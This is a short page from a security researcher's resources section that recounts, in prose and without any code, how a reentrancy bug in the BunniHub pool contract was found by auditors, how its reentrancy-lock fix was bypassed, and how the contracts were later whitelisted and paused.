Resources

People often ask me "How did you learn how to hack?" The answer: by reading. This page is a collection of the blog posts and other articles that I have accumulated over the years of my journey. Enjoy!

The contract BunniHub is a pool contract. There was a vulnerability that allowed for calling back into this code while the pool was in an unintended state, classic reentrancy, via a user-defined hook. Inevitably, this would have led to lost user funds. Pashov audits found this reentrancy vulnerability during their audit.

To mitigate the original issue, they introduced a set of functions for prevent reentrancy. This was done by adding two functions: lockForRebalance and unlockForRebalance. This locked the rebalance before the order and unlocked it once the order was executed. These locks are per contract and not per pool.

A Bunni pool can have a hook contract that triggers this functionality registered by anyone. Since the locks are global, an attacker can create a hook contract, call it and disable the reentrancy lock themselves. Now, manipulation is the same as before and leads to loss of funds. Cyfrin, a web3 auditing company, found this bypass.

To patch the issue immediately, they created a whitelist on who is able to execute rebalancing actions. The attack was prevented, theoretically. To be cautious, they asked Cyfrin if any other reentrancy attacks were still possible and they did more research into it. They found a similar vulnerability when interacting with a malicious ERC-4626 vault that broke the accounting of the pool to withdraw more assets than they should be able to. To resolve this new issue, all functionality was paused until a proper fix could be made.

The contracts were audited by Pashov Audit Group and Trail of Bits. Currently, and they are being audited by Cyfrin as part of the Uniswap Foundation Security Fund. Patching vulnerabilities is hard; patches need to be taken really seriously when they're suggested. Otherwise, you'll end up with more issues like this.